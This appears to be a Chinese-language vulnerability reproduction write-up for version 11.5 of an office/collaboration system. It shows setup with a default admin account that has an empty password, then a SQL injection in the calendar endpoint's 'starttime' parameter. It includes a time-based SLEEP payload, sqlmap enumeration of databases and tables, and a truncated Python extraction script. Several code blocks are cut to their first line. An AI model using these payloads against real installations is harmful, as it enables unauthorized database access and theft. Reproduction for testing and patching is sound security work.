一、环境搭建:
安装11.5版本,官网最新的是11.7版本,从网上找到一个11.5的安装包,直接一键安装成功。
默认账户admin
,密码 为空
登录后,搜索用户,创建一个普通用户,添加用户的信息。然后使用用户登录,创建会议,admin去审核通过。
二、验证漏洞
1. sql注入
进入到普通用户的界面,然后打开日历。看到日历中心。然后抓包。
1 | POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1 |
注入点在starttime
,该漏洞属于bool盲注。
发送到sqlmap跑注入点、数据库类型、数据库名称、数据库表、数据内容。
1 | view=month&starttime=1595779200') AND (SELECT 6129 FROM (SELECT(SLEEP(5)))lWYm) AND ('nXWx'='nXWx&endtime=1599408000&callback=undefined |
1 | sqlmap identified the following injection point(s) with a total of 445 HTTP(s) requests: |
1 | available databases [8]: |
1 | -D BUS -T post_tel -columns |
这个过程超级慢,安恒公众号发了一篇文章使用多线程跑数据。
1 | import requests |